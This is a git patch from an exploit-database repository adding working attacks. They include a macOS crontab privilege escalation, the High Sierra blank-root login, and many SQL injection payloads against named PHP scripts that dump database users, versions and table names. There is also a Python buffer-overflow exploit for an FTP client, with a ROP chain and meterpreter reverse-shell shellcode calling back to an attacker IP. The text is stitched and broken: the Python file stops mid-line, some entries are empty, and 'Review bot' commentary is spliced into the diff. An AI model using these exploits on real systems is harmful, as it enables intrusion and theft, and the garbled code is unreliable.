From c35d9b35f710aab7b9569a1f3549711e3c5bc30f Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 9 Dec 2017 05:02:21 +0000 Subject: [PATCH] DB: 2017-12-09 14 changes to exploits/shellcodes macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement Apple macOS < 10.12.2 / iOS < 10.2 Kernel - ipc_port_t Reference Count Leak Due to Incorrect externalMethod Overrides Use-After-Free Apple macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement Apple macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free Apple macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption Apple macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free Apple macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free Wireshark 2.4.0 - 2.4.2 / 2.2.0 - 2.2.10 - CIP Safety Dissector Crash Linux Kernel - DCCP Socket Use-After-Free Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free Apple iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation Apple iOS/macOS - 'xpc_data' Objects Sandbox Escape Privilege Escalation macOS High Sierra - Local Privilege Escalation (Metasploit) Apple macOS 
10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit) Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation LabF nfsAxe FTP Client 3.7 - Buffer Overflow (DEP Bypass) DomainSale PHP Script 1.0 - 'id' SQL Injection Simple Chatting System 1.0.0 - Arbitrary File Upload Website Auction Marketplace 2.0.5 - 'cat_id' SQL Injection Realestate Crowdfunding Script 2.7.2 - 'pid' SQL Injection FS Thumbtack Clone 1.0 - 'cat' / 'sc' SQL Injection FS Stackoverflow Clone 1.0 - 'keywords' SQL Injection FS Shutterstock Clone 1.0 - 'keywords' SQL Injection FS Quibids Clone 1.0 - SQL Injection FS Olx Clone 1.0 - 'scat' / 'pid' SQL Injection FS Monster Clone 1.0 - 'Employer_Details.php?id' SQL Injection --- exploits/macos/local/43247.md | 19 +++++ exploits/macos/local/43248.md | 16 +++++ exploits/php/webapps/43102.txt | 1 + exploits/php/webapps/43235.txt | 29 ++++++++ exploits/php/webapps/43237.txt | 27 ++++++++ exploits/php/webapps/43238.txt | 29 ++++++++ exploits/php/webapps/43239.txt | 29 ++++++++ exploits/php/webapps/43240.txt | 37 ++++++++++ exploits/php/webapps/43241.txt | 30 ++++++++ exploits/php/webapps/43242.txt | 30 ++++++++ exploits/php/webapps/43243.txt | 30 ++++++++ exploits/php/webapps/43244.txt | 36 ++++++++++ exploits/php/webapps/43245.txt | 28 ++++++++ exploits/windows/remote/43236.py | 115 +++++++++++++++++++++++++++++++ files_exploits.csv | 37 ++++++---- 15 files changed, 481 insertions(+), 12 deletions(-) create mode 100644 exploits/macos/local/43247.md create mode 100644 exploits/macos/local/43248.md create mode 100644 exploits/php/webapps/43235.txt create mode 100644 exploits/php/webapps/43237.txt create mode 100644 exploits/php/webapps/43238.txt create mode 100644 exploits/php/webapps/43239.txt create mode 100644 exploits/php/webapps/43240.txt create mode 100644 exploits/php/webapps/43241.txt create mode 100644 
exploits/php/webapps/43242.txt create mode 100644 exploits/php/webapps/43243.txt create mode 100644 exploits/php/webapps/43244.txt create mode 100644 exploits/php/webapps/43245.txt create mode 100755 exploits/windows/remote/43236.py diff --git a/exploits/macos/local/43247.md b/exploits/macos/local/43247.md new file mode 100644 index 000000000..32663b68f --- /dev/null +++ b/exploits/macos/local/43247.md @@ -0,0 +1,19 @@ +Recently I was working on an security issue in some other software that has yet to be disclosed which created a rather interesting condition. As a non-root user I was able to write to any file on the system that was not SIP-protected but the resulting file would not be root-owned, even if it previously was. + +This presented an interesting challenge for privilege escalation - how would you exploit this to obtain root access? The obvious first attempt was the sudoers file but sudo is smart enough not to process it if the file isn't root-owned so that didn't work. + +I then discovered (after a tip from a friend - thanks pndc!) that the cron system in macOS does not care who the crontab files are owned by. Getting root was a simple case of creating a crontab file at: + +``` +/var/at/tabs/root +``` + +with a 60-second cron line, eg: + +``` +* * * * * chown root:wheel /tmp/payload && chmod 4755 /tmp/payload +``` + +and then waiting for it to execute. It's not clear if this is a macOS-specific issue or a hangover from the BSD-inherited cron system, I suspect the latter. + +The issue has been reported to Apple so hopefully they will fix it. \ No newline at end of file diff --git a/exploits/macos/local/43248.md b/exploits/macos/local/43248.md new file mode 100644 index 000000000..13de97f16 --- /dev/null +++ b/exploits/macos/local/43248.md 
@@ -0,0 +1,16 @@ +## Source: https://twitter.com/lemiorhan/status/935578694541770752 & https://forums.developer.apple.com/thread/79235 +"Dear @AppleSupport, we noticed a *HUGE* security issue at MacOS High Sierra. Anyone can login as "root" with empty password after clicking on login button several times. Are you aware of it @Apple?" + + +## Proof: https://twitter.com/patrickwardle/status/935608904377077761 + + +## Mitigation/Detection/Forensic: https://news.ycombinator.com/item?id=15800676 +- Can be mitigated by enabling the root user with a strong password +- Can be detected with `osquery` using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" AND key = "passwd" AND length(value) > 1;";` +- You can see what time the root account was enabled using `SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" WHERE key = "accountPolicyData";` then base 64 decoding that into a file and then running `plutil -convert xml1` and looking at the `passwordLastSetTime` field. +_Note: osquery needs to be running with `sudo` but if you have it deployed across a fleet of macs as a daemon then it will be running with `sudo` anyway._ +_Note: You can get the same info with plutil(1): `$ sudo plutil -p /private/var/db/dslocal/nodes/Default/users/root.plist`_ + + +## Security Advisory: https://support.apple.com/en-gb/HT208315 \ No newline at end of file diff --git a/exploits/php/webapps/43102.txt b/exploits/php/webapps/43102.txt index 4bc47379a..a32b63c50 100644 --- a/exploits/php/webapps/43102.txt +++ b/exploits/php/webapps/43102.txt @@ -21,6 +21,7 @@ # Proof of Concept: # # http://localhost/[PATH]/my_profile.php +# http://localhost/[PATH]/view/teacher_profile2.php # http://localhost/[PATH]/uploads/[FILE] # # Etc.. diff --git a/exploits/php/webapps/43235.txt b/exploits/php/webapps/43235.txt new file mode 100644 index 000000000..89e838517 --- /dev/null +++ b/exploits/php/webapps/43235.txt 
@@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: DomainSale PHP Script 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.codester.com/ChewiScripts +# Software Link: https://www.codester.com/items/5301/domainsale-php-script +# Demo: http://chewiscripts.x10host.com/domain/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/domain.php?id=[SQL] +# +# 14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+- +# +# http://server/domain.php?id=14'++/*!11111UNION*/(/*!11111SELECT*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()),0x283329,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229)--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43237.txt b/exploits/php/webapps/43237.txt new file mode 100644 index 000000000..6a5e23123 --- /dev/null +++ b/exploits/php/webapps/43237.txt 
@@ -0,0 +1,27 @@ +# # # # # +# Exploit Title: Simple Chatting System 1.0 - Arbitrary File Upload +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: http://yourphpscript.com/ +# Software Link: http://yourphpscript.com/index.php/product/simple-chatting-system-php-ajax-mysql-javascript/ +# Demo: http://chat.yourphpscript.com/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker upload arbitrary file.... +# +# Proof of Concept: +# +# Users profile picture arbitrary file can be uploaded .. +# +# http://localhost/[PATH]/view/my_profile.php +# http://localhost/[PATH]/uploads/[DATE].php +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43238.txt b/exploits/php/webapps/43238.txt new file mode 100644 index 000000000..50d88b39e --- /dev/null +++ b/exploits/php/webapps/43238.txt 
@@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Website Auction Marketplace 2.0.5 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://flippa-clone.com/ +# Software Link: https://flippa-clone.com/ +# Demo: https://demo.flippa-clone.com/ +# Version: 2.0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/search.php?cat_id=[SQL] +# +# 29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- - +# +# https://server/search.php?cat_id=29' UNION(SELECT(1),(2),(3),(4),concat(version(),0x7e494853414e2053454e43414e),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60))-- - +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43239.txt b/exploits/php/webapps/43239.txt new file mode 100644 index 000000000..7da6e61ea --- /dev/null +++ b/exploits/php/webapps/43239.txt 
@@ -0,0 +1,29 @@ +# # # # # +# Exploit Title: Realestate Crowdfunding Script 2.7.2 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/realestate-crowdfunding-script/ +# Demo: http://thavasu.com/demo/crowdfunding/ +# Version: 2.7.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/single-cause.php?pid=[SQL] +# +# -23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+- +# +# http://server/single-cause.php?pid=-23'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51))--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43240.txt b/exploits/php/webapps/43240.txt new file mode 100644 index 000000000..51a1c75e0 --- /dev/null +++ b/exploits/php/webapps/43240.txt 
@@ -0,0 +1,37 @@ +# # # # # +# Exploit Title: FS Thumbtack Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/thumbtack-clone/ +# Demo: http://thumbtack-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/browse-category.php?cat=[SQL] +# +# -91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+- +# +# http://server/browse-category.php?cat=-91a87ff679a2f3e71d9181a67b7542122c'++/*!22222UNION*/(/*!22222SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(4))--+- +# +# +# 2) +# http://localhost/[PATH]/browse-scategory.php?sc=[SQL] +# +# -34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- +# +# http://server/browse-scategory.php?sc=-34202cb962ac59075b964b07152d234b70'++/*!22222UNION*/+/*!22222SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9--+- +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43241.txt b/exploits/php/webapps/43241.txt new file mode 100644 index 000000000..b21f559bb --- /dev/null +++ b/exploits/php/webapps/43241.txt @@ -0,0 +1,30 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43242.txt b/exploits/php/webapps/43242.txt new file mode 100644 index 000000000..540a0bfe9 --- /dev/null +++ b/exploits/php/webapps/43242.txt @@ -0,0 +1,30 @@ + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/43243.txt b/exploits/php/webapps/43243.txt new file mode 100644 index 000000000..46f044887 --- /dev/null +++ b/exploits/php/webapps/43243.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: FS Quibids Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/quibids-clone/ +# Demo: http://quibids-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/itechd.php?productid=[SQL] +# +# Parameter: productid (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: productid=609 AND 2165=2165 +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43244.txt b/exploits/php/webapps/43244.txt new file mode 100644 index 000000000..eaca1106d --- /dev/null +++ b/exploits/php/webapps/43244.txt 
@@ -0,0 +1,36 @@ +# # # # # +# Exploit Title: FS Olx Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/olx-clone/ +# Demo: http://olx-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/subpage.php?scat=[SQL] +# +# 51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+- +# +# http://server/subpage.php?scat=51'++UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+- +# +# 2) +# http://localhost/[PATH]/message.php?pid=[SQL] +# +# -1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# view-source:http://server/message.php?pid=-1'++UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+- +# +# # # # # \ No newline at end of file 
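Review bot: the only indication in 43244.txt that the second injection's output is not rendered is the `view-source:` prefix on the `message.php` URL (the payload separates table names with `0x3c62723e`, i.e. `<br>`, which only reads naturally in source view); the description should state explicitly that the result appears in the HTML source rather than on the visible page, otherwise a reader reproducing the PoC will conclude it failed. The `Description` line is the same boilerplate as the other entries in this commit (`The vulnerability allows an attacker to inject sql commands....`) and names neither the two affected pages (`subpage.php`, `message.php`) nor the parameters (`scat`, `pid`) that the CSV title lists.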
diff --git a/exploits/php/webapps/43245.txt b/exploits/php/webapps/43245.txt new file mode 100644 index 000000000..7f06f657c --- /dev/null +++ b/exploits/php/webapps/43245.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: FS Monster Clone 1.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://fortunescripts.com/ +# Software Link: https://fortunescripts.com/product/monster-clone/ +# Demo: http://monster-clone.demonstration.co.in/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/Employer_Details.php?id=[SQL] +# +# -3'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32))--+- +# +# +# # # # # \ No newline at end of file diff --git a/exploits/windows/remote/43236.py b/exploits/windows/remote/43236.py new file mode 100755 index 000000000..a6664e2dc --- /dev/null +++ b/exploits/windows/remote/43236.py 
@@ -0,0 +1,115 @@ +#!/usr/bin/env python +# +# Exploit Title : LabF nfsAxe 3.7 FTP Client (DEP Bypass) +# Date : 12/8/2017 +# Exploit Author : wetw0rk +# Vendor Homepage : http://www.labf.com/nfsaxe/nfs-server.html +# Software link : http://www.labf.com/download/nfsaxe.exe +# Version : 3.7 +# Tested on : Windows 7 (x86) +# Description : Upon connection the victim is sent a specially crafted buffer +# overwriting the SEH record, resulting in code execution. +# +# Greetz: abatchy17, mvrk, and Dillage (Dilly Dilly) +# +# Trigger the vulnerability by : +# Login as -> [check] anonymous -> connect +# + +import struct, socket + +host = "0.0.0.0" +port = 21 + +# msfvenom LHOST=192.168.0.12 LPORT=34 -p windows/meterpreter/reverse_tcp +# -f python -b "\x00\x0a\x10" -v shellcode --smallest +shellcode = "" +shellcode += "\x2b\xc9\x66\xb9\x18\x01\xe8\xff\xff\xff\xff\xc1" +shellcode += "\x5e\x30\x4c\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05" +shellcode += "\x06\x67\x81\xec\x3b\xcb\x68\x86\x5e\x3f\x9b\x43" +shellcode += "\x1e\x98\x46\x01\x9d\x65\x30\x16\xad\x51\x3a\x2c" +shellcode += "\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28" +shellcode += "\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe" +shellcode += "\x7a\x26\x40\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40" +shellcode += "\x91\xc8\x0d\x5d\xa5\x7d\x01\xc2\x7e\xc0\x4d\x9b" +shellcode += "\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e\xb7\x2d\xaf" +shellcode += "\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41" +shellcode += "\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa" +shellcode += "\x76\xf8\x75\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24" +shellcode += "\x24\x2e\x7f\x61\xdd\xdc\xde\x0e\x94\x6c\x05\xd4" +shellcode += "\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0\xcc\xc0\xfd" +shellcode += "\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88" +shellcode += "\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xc6\xa7" +shellcode += "\xc6\x6f\x18\xb1\xbe\xdb\xb6\xb5\xb6\x95\x31\x5f" +shellcode += "\xea\xeb\xec\xed\xfe\xef\x80\x91\xaa\x29\xcb\x1a" +shellcode += 
"\x26\x38\x1d\x5e\xa0\xdb\x9a\x9a\xa6\x56\x75\xa5" +shellcode += "\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31" +shellcode += "\xb6\x2f\x55\x43\xb4\x1c\x31\x8f\xe6\x8d\xec\xbf" +shellcode += "\xbd\x83\xee\x34\x26\xb0\x0f\x24\x79\xc5\x9e\xb5" +shellcode += "\x9e\xf7\xe8\xf9\xfa\xad\x96\xfd\x96\xa7\xa4\x52" +shellcode += "\xe7\xfc\xd1\x96\x55\x6d\x08\x5f\x59\x5c\x64\x0f" +shellcode += "\xd7\xc7\x4f\xee\xc7\x12\xd7\x3c\xd0\x62\xf6\xda" + +def create_rop_chain(): + # https://www.corelan.be/index.php/security/corelan-ropdb/ + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN + 0xfffffdff, # Value to negate, will become 0x00000201 (dwSize) + 0x7c347f98, # RETN (ROP NOP) [msvcr71.dll] + 0x7c3415a2, # JMP [EAX] [msvcr71.dll] + 0xffffffff, # + 0x7c376402, # skip 4 bytes [msvcr71.dll] + 0x7c351e05, # NEG EAX # RETN [msvcr71.dll] + 0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll] + 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll] + 0x7c344f87, # POP EDX # RETN [msvcr71.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x7c351eb1, # NEG EDX # RETN [msvcr71.dll] + 0x7c34d201, # POP ECX # RETN [msvcr71.dll] + 0x7c38b001, # &Writable location [msvcr71.dll] + 0x7c347f97, # POP EAX # RETN [msvcr71.dll] + 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] + 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] + 0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll] + ] + return ''.join(struct.pack('
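Review bot: the 43247.md hunk has no header giving the affected version, author, source or date, unlike every other entry in this commit, and the commit message files it as "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" while the text itself never names a version; add at least a title line and the platform/version on which the behaviour was observed. A Mitigation/Detection section of the kind 43248.md carries would also be useful: the write-up identifies `/var/at/tabs/root` as a crontab that cron runs without an ownership check, so a non-root-owned or unexpectedly modified file under `/var/at/tabs/` is the concrete thing for defenders to audit. The file is also missing its trailing newline (`\ No newline at end of file`).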
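Review bot: the second osquery statement in the Mitigation/Detection list of 43248.md is not valid SQL, since it has two `WHERE` clauses (`WHERE path = "..." WHERE key = "accountPolicyData"`); the second `WHERE` should be `AND`, matching the form of the first query. The first query also ends with a stray `";` after its semicolon (`length(value) > 1;";`), which breaks copy-paste. Suggested:
`SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" AND key = "passwd" AND length(value) > 1;`
`SELECT * FROM plist WHERE path = "/private/var/db/dslocal/nodes/Default/users/root.plist" AND key = "accountPolicyData";`
The `Proof:` entry is a bare tweet link, which may disappear; quoting the relevant text inline, as the `Source:` section already does, keeps the entry self-contained.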
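Review bot: the line added to 43102.txt inserts a second path, `view/teacher_profile2.php`, into the proof-of-concept list without saying how it relates to `my_profile.php` (a second upload form, or the same form reached by a different role?); one clarifying word in the comment, plus a revision note in the header, would let readers see why the entry was updated.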
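Review bot: the `Tested on:` field in 43235.txt names the tester's operating systems (`WiN7_x64/KaLiLinuX_x64`) rather than the target stack, yet the payload depends on MySQL-specific syntax (`/*!11111UNION*/` version comments, `export_set`, `information_schema.columns`) and so only applies to MySQL/MariaDB backends; state the PHP and MySQL versions the script was tested against. The `Exploit Title` line also omits the injectable parameter that the commit's CSV title carries (`'id' SQL Injection`); aligning the two avoids the entry being listed under different names.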
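Review bot: the description in 43237.txt (`The vulnerability allows an attacker upload arbitrary file....`) is ungrammatical and, more importantly, does not say which control the upload handler lacks; the PoC shows only the form page (`view/my_profile.php`) and the resulting path (`uploads/[DATE].php`). Naming the missing check (extension allow-list, content-type validation, or storing uploads outside the web root) is what lets a maintainer verify a fix, and the `[DATE].php` pattern deserves a sentence explaining that the stored file keeps the user-supplied extension. At minimum: `# The vulnerability allows an attacker to upload an arbitrary file via the profile-picture form.`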
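Review bot: `Vendor Homepage` and `Software Link` in 43238.txt are the same URL (`https://flippa-clone.com/`), so nothing in the header points at the product page or the 2.0.5 release the title claims; give a product or changelog link so the affected version can be confirmed and a fixed version identified later. The hex literal in the payload (`0x7e494853414e2053454e43414e`, which decodes to `~IHSAN SENCAN`) is an author marker, not part of the technique; a comment saying so stops readers treating it as required.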
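Review bot: each PoC in 43239.txt is written twice, once as `http://localhost/[PATH]/single-cause.php?pid=[SQL]` followed by the bare payload and again as a full `http://server/...` URL carrying the same payload; the second form adds only a hostname, doubles the length of every entry, and means any later correction to the payload has to be made in two places. Keep one form (43235, 43238, 43240 and 43244 in this commit have the same duplication). The `Demo:` URL is also on a different domain (thavasu.com) from the `Vendor Homepage` (phpscriptsmall.com); say whether it is the vendor's own demo.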
